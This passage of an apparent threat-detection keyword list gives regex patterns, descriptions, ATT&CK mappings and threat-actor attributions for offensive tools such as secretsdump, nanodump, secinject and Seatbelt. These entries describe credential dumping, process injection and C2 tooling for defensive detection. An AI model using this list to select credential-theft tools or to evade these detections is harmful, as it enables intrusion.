APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security 
scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SeatbeltNet*.exe*",".{0,1000}SeatbeltNet.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*secgroundzero*",".{0,1000}secgroundzero.{0,1000}","offensive_tool_keyword","Github Username","github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secgroundzero","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sec-inject *",".{0,1000}sec\-inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.cna*",".{0,1000}secinject\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process 
Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.git*",".{0,1000}secinject\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.x64*",".{0,1000}secinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.x86*",".{0,1000}secinject\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject/src*",".{0,1000}secinject\/src.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*SecLists*",".{0,1000}SecLists.{0,1000}","offensive_tool_keyword","SecLists","SecLists is the security testers companion. Its a collection of multiple types of lists used during security assessments. collected in one place. List types include usernames. passwords. URLs. sensitive data patterns. fuzzing payloads. web shells. and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.","T1210.002 - T1212.001 - T1589.001","TA0040 - TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/danielmiessler/SecLists","1","1","N/A","N/A","10","53761","23323","2024-05-01T18:13:49Z","2012-02-19T01:30:18Z" "*--seclogon-leak-local*",".{0,1000}\-\-seclogon\-leak\-local.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*--seclogon-leak-remote*",".{0,1000}\-\-seclogon\-leak\-remote.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*secrary*",".{0,1000}secrary.{0,1000}","offensive_tool_keyword","Github Username","github username hosting process injection codes ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secrary","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*secredump.exe*",".{0,1000}secredump\.exe.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*secret_fragment_exploit.py */_fragment*",".{0,1000}secret_fragment_exploit\.py\s.{0,1000}\/_fragment.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*SecretFinder.py*",".{0,1000}SecretFinder\.py.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" 
"*SecretFinder-master.zip*",".{0,1000}SecretFinder\-master\.zip.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*secrets/secrets_manager/secrets.txt*",".{0,1000}secrets\/secrets_manager\/secrets\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*secrets_dump*",".{0,1000}secrets_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*secrets_dump_dcsync*",".{0,1000}secrets_dump_dcsync.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*secretsdump *--silent*",".{0,1000}secretsdump\s.{0,1000}\-\-silent.{0,1000}","offensive_tool_keyword","CSExec","An alternative to 
*exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*secretsdump -sam *",".{0,1000}secretsdump\s\-sam\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*secretsdump*",".{0,1000}secretsdump.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation (could be other malicious tools too)","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","7","600","145","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" "*secretsdump.*.pyc*",".{0,1000}secretsdump\..{0,1000}\.pyc.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" 
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of 
impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*secretsquirrel/the-backdoor-factory*",".{0,1000}secretsquirrel\/the\-backdoor\-factory.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*SecScanC2_admin *",".{0,1000}SecScanC2_admin\s.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*SecScanC2_admin_*",".{0,1000}SecScanC2_admin_.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*SecScanC2_node *",".{0,1000}SecScanC2_node\s.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. 
The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*SecScanC2_node_*",".{0,1000}SecScanC2_node_.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*SecScanC2-main*",".{0,1000}SecScanC2\-main.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. 
The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*sec-shinject *",".{0,1000}sec\-shinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*securesocketfunneling*",".{0,1000}securesocketfunneling.{0,1000}","offensive_tool_keyword","securesocketfunneling","Secure Socket Funneling (SSF) is a network tool and toolkit It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer","T1071.001 - T1573 - T1572","TA0003 - TA0009 - ","N/A","N/A","POST 
Exploitation tools","https://securesocketfunneling.github.io/ssf/#home","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*security-onion*",".{0,1000}security\-onion.{0,1000}","offensive_tool_keyword","security-onion","Security Onion is a free and open source Linux distribution for threat hunting. enterprise security monitoring. and log management. It includes Elasticsearch. Logstash. Kibana. Snort. Suricata. Bro. Wazuh. Sguil. Squert. NetworkMiner. and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes","T1059 - T1059.001 - T1059.003 - T1059.004","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Infosec Operation system","https://github.com/Security-Onion-Solutions/security-onion","1","1","N/A","N/A","10","3056","518","2021-04-16T12:14:31Z","2015-03-24T20:15:23Z" "*securitywithoutborders*",".{0,1000}securitywithoutborders.{0,1000}","offensive_tool_keyword","Github Username","pentest documentations","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/securitywithoutborders","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 